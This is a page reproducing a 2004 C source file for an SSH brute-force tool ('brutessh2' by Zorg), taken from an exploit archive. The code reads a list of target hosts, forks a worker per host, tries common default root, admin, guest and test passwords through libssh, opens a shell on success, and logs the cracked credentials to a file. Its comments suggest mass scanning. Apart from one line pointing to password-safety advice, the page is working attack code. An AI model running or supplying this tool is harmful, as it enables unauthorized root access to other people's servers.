| + * http://www.frsirt.com/exploits/08202004.brutessh2.c.php |
| + |
| = {{{ |
| = SSH Remote Root password Brute Force Cracker Utility |
| = Date : 20/08/2004 |
| = |
| = |
| = |
| = |
| = This exploit is known to be circulating in the wild. Protect yourself and you passwords ! |
| = Read : "Choosing and Protecting your Passwords" -> http://www.us-cert.gov/cas/tips/ST04-002.html |
| = |
| = |
| = /* |
| = *the first brutessh was only for guest & test logins |
| = *brutessh2 is a brute for sshd port which attempts to login as root with more than 2000 passwords. |
| = *users guest , test , nobody and admin with no passwords are included. |
| = *feel free to add more passwords and more users |
| = *by Zorg |
| = *For mass use a synscan : |
| = *Eg: ./biggssh sship.txt |
| = * Ok.Try This : Hostname root:12345 |
| = */ |
| = |
| = |
| = #include <stdio.h> |
| = #include <unistd.h> |
| = #include <stdlib.h> |
| = #include <string.h> |
| = #include <termios.h> |
| = #include <sys/select.h> |
| = #include <sys/time.h> |
| = #include <signal.h> |
| = #include <errno.h> |
| = #include <libssh/libssh.h> |
| = #include <libssh/sftp.h> |
| = #include <arpa/inet.h> |
| = #include <stdio.h> |
| = #include <netdb.h> |
| = #include <string.h> |
| = #include <fcntl.h> |
| = #include <unistd.h> |
| = #include <time.h> |
| = #include <stdlib.h> |
| = #include <sys/types.h> |
| = #include <sys/socket.h> |
| = #include <sys/wait.h> |
| = #include <netinet/in.h> |
| = |
| = int flag; |
| = int where; |
| = int shell(SSH_SESSION *session){ |
| = struct timeval tv; |
| = int err; |
| = char cmd[]="uname -r -s\n"; |
| = char rd[2048]; |
| = BUFFER *readbuf=buffer_new(); |
| = time_t start,acum; |
| = |
| = |
| = CHANNEL *channel; |
| = channel = open_session_channel(session,1000,1000); |
| = if(isatty(0)) |
| = err=channel_request_pty(channel); |
| = // printf("channel request pty > %d\n",err); |
| = err= channel_request_shell(channel); |
| = // printf("channel request shell > %d\n",err); |
| = start=time(0); |
| = while (channel->open!=0) |
| = { |
| = usleep(500000); |
| = err=channel_poll(channel,0); |
| = if(err>0) |
| = { |
| = err=channel_read(channel,readbuf,0,0); |
| = } |
| = else |
| = { |
| = if(start+5<time(0)) |
| = { |
| = //printf("5 secs passed\n"); |
| = return 1; |
| = } |
| = } |
| = } |
| = return 0; |
| = } |
| = |
| = |
| = |
| = void checkauth(char *user,char *password,char *host) |
| = { |
| = char warn[125]=""; |
| = SSH_SESSION *session; |
| = SSH_OPTIONS *options; |
| = int argc=1; |
| = char *argv[]={"none"}; |
| = FILE *fp; |
| = |
| = if(where%20==0) |
| = { |
| = fp=fopen("log.bigsshf","a"); |
| = fprintf(fp,"tring ssh %s@%s %s\n",user,host,password); |
| = fclose(fp); |
| = } |
| = where++; |
| = alarm(10); |
| = options=ssh_getopt(&argc,argv); |
| = options_set_username(options,user); |
| = options_set_host(options,host); |
| = session=ssh_connect(options); |
| = if(!session) return ; |
| = |
| = if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) |
| = { |
| = ssh_disconnect(session); |
| = return; |
| = } |
| = |
| = if(shell(session)) |
| = { |
| = if(flag) strcpy(warn,"DUP "); |
| = fp=fopen("vuln.txt","a+"); |
| = fprintf(fp,"%s%s:%s:%s\n",warn,user,password,host); |
| = printf("%sOk.TRY This : %s:%s:%s\n",warn,user,password,host); |
| = flag=1; |
| = } |
| = else |
| = printf("nologin -> %s:%s:%s\n",user,password,host); |
| = } |
| = int main(int argc, char **argv) |
| = { |
| = FILE *fp; |
| = char *c; |
| = char buff[1024]; |
| = int numforks; |
| = int maxf; |
| = |
| = |
| = if(argc!=2) |
| = { |
| = printf("./bigssh <sship.txt>\n"); |
| = printf("by Zorg\n"); |
| = exit(0); |
| = } |
| = unlink("log.bigsshf"); |
| = fp=fopen("sship.log","r"); |
| = if(fp==NULL) exit(printf("nu pot deschide sship.txt\n")); |
| = |
| = maxf=atoi(argv[1]); |
| = while(fgets(buff,sizeof(buff),fp)) |
| = { |
| = c=strchr(buff,'\n'); |
| = if(c!=NULL) *c='\0'; |
| = if (!(fork())) |
| = { |
| = //child |
| = where=0; |
| = checkauth("test","test",buff); |
| = checkauth("guest","guest",buff); |
| = checkauth("admin","admins",buff); |
| = checkauth("admin","admin",buff); |
| = checkauth("user","user",buff); |
| = checkauth("root","password",buff); |
| = checkauth("root","root",buff); |
| = checkauth("root","123456",buff); |
| = checkauth("test","123456",buff); |
| = checkauth("test","12345",buff); |
| = checkauth("test","1234",buff); |
| = checkauth("test","123",buff); |
| = checkauth("root","!@#$%",buff); |
| = checkauth("root","!@#$%^",buff); |
| = checkauth("root","!@#$%^&",buff); |
| = checkauth("root","!@#$%^&*",buff); |
| = checkauth("root","*",buff); |
| = checkauth("root","000000",buff); |
| = checkauth("root","00000000",buff); |
| = exit(0); |
| = } |
| = else |
| = { |
| = //parent |
| = numforks++; |
| = if (numforks > maxf) |
| = for (numforks; numforks > maxf; numforks--) |
| = wait(NULL); |
| = } |
| = |
| = } |
| = |
| = } |
| = |
| = |
| = }}} |
| = |
